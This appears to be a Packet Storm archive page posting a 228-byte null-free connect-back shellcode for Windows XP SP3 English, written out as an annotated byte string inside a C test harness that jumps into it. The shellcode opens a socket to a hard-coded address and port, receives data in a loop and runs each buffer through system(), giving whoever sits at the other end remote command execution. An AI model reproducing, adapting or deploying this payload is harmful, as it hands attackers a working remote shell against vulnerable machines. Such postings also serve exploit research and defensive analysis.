what you don't know can hurt you

Windows XP SP3 EN Null-Free Connect Back Shellcode

Windows XP SP3 EN Null-Free Connect Back Shellcode
Posted Dec 25, 2010
Authored by AutoSec Tools

228 bytes small Microsoft Windows XP SP3 EN null-free connect-back shellcode.

tags | shellcode
systems | windows, xp
MD5 | 2e088e5ff54e3ed964db40cd7b87d363

Windows XP SP3 EN Null-Free Connect Back Shellcode

Change Mirror Download
/*------------------------------------------------------------------------
Title...................Windows XP SP3 EN Null-free Connect Back Shellcode 228 Bytes
Release Date............12/7/2010
Tested On...............Windows XP SP3 EN
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://www.johnleitch.net/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------*/

int main(int argc, char *argv[])
{
// Listen on 127.0.0.1:5230
char* shellcode=
"\x33\xDB" // xor ebx,ebx
"\xC7\x45\x08\x40\xAE\x80\x7C" // mov dword ptr [argc],7C80AE40h
"\xC7\x45\x04\x7B\x1D\x80\x7C" // mov dword ptr [ebp+4],7C801D7Bh
"\x68\x64\x6C\x6C\x01" // push 16C6C64h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x6B\x33\x32\x2E" // push 2E32336Bh
"\x68\x77\x73\x6F\x63" // push 636F7377h
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x8B\xF0" // mov esi,eax
"\x53" // push ebx
"\xC6\x04\x24\x75" // mov byte ptr [esp],75h
"\xC6\x44\x24\x01\x70" // mov byte ptr [esp+1],70h
"\x68\x74\x61\x72\x74" // push 74726174h
"\x68\x57\x53\x41\x53" // push 53415357h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x7F" // sub esp,7Fh
"\x83\xEC\x13" // sub esp,13h
"\x54" // push esp
"\x54" // push esp
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x74" // mov byte ptr [esp+1],74h
"\x68\x73\x6F\x63\x6B" // push 6B636F73h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x01" // push 1
"\x6A\x02" // push 2
"\xFF\xD0" // call eax
"\x89\x45\xFC" // mov dword ptr [ebp-4],eax
"\x68\x65\x63\x74\x01" // push 1746365h
"\xD0\x6C\x24\x03" // shr byte ptr [esp+3],1
"\x68\x63\x6F\x6E\x6E" // push 6E6E6F63h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x6A\x01" // push 1
"\x6A\x7F" // push 7Fh
"\xC6\x44\x24\x03\x01" // mov byte ptr [esp+3],1
"\x68\x02\x01\x14\x6E" // push 6E140102h
"\xD0\x6C\x24\x01" // shr byte ptr [esp+1],1
"\x8B\xFC" // mov edi,esp
"\x6A\x10" // push 10h
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\x68\x72\x65\x63\x76" // push 76636572h
"\x54" // push esp
"\x56" // push esi
"\xFF\x55\x08" // call dword ptr [argc]
"\x53" // push ebx
"\x6A\x7F" // push 7Fh
"\x57" // push edi
"\xFF\x75\xFC" // push dword ptr [ebp-4]
"\xFF\xD0" // call eax
"\x53" // push ebx
"\xC6\x04\x24\x6C" // mov byte ptr [esp],6Ch
"\xC6\x44\x24\x01\x6C" // mov byte ptr [esp+1],6Ch
"\x68\x72\x74\x2E\x64" // push 642E7472h
"\x68\x6D\x73\x76\x63" // push 6376736Dh
"\x54" // push esp
"\xFF\x55\x04" // call dword ptr [ebp+4]
"\x53" // push ebx
"\xC6\x04\x24\x65" // mov byte ptr [esp],65h
"\xC6\x44\x24\x01\x6D" // mov byte ptr [esp+1],6Dh
"\x68\x73\x79\x73\x74" // push 74737973h
"\x54" // push esp
"\x50" // push eax
"\xFF\x55\x08" // call dword ptr [argc]
"\x57" // push edi
"\xFF\xD0" // call eax
"\xEB\xBB" // jmp recv_loop (4010B3h)
;

printf("shellcode length: %i", strlen(shellcode));

__asm jmp shellcode

return 0;
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    21 Files
  • 2
    Apr 2nd
    35 Files
  • 3
    Apr 3rd
    21 Files
  • 4
    Apr 4th
    16 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    1 Files
  • 7
    Apr 7th
    2 Files
  • 8
    Apr 8th
    23 Files
  • 9
    Apr 9th
    19 Files
  • 10
    Apr 10th
    15 Files
  • 11
    Apr 11th
    14 Files
  • 12
    Apr 12th
    11 Files
  • 13
    Apr 13th
    2 Files
  • 14
    Apr 14th
    5 Files
  • 15
    Apr 15th
    14 Files
  • 16
    Apr 16th
    19 Files
  • 17
    Apr 17th
    19 Files
  • 18
    Apr 18th
    8 Files
  • 19
    Apr 19th
    4 Files
  • 20
    Apr 20th
    5 Files
  • 21
    Apr 21st
    1 Files
  • 22
    Apr 22nd
    4 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close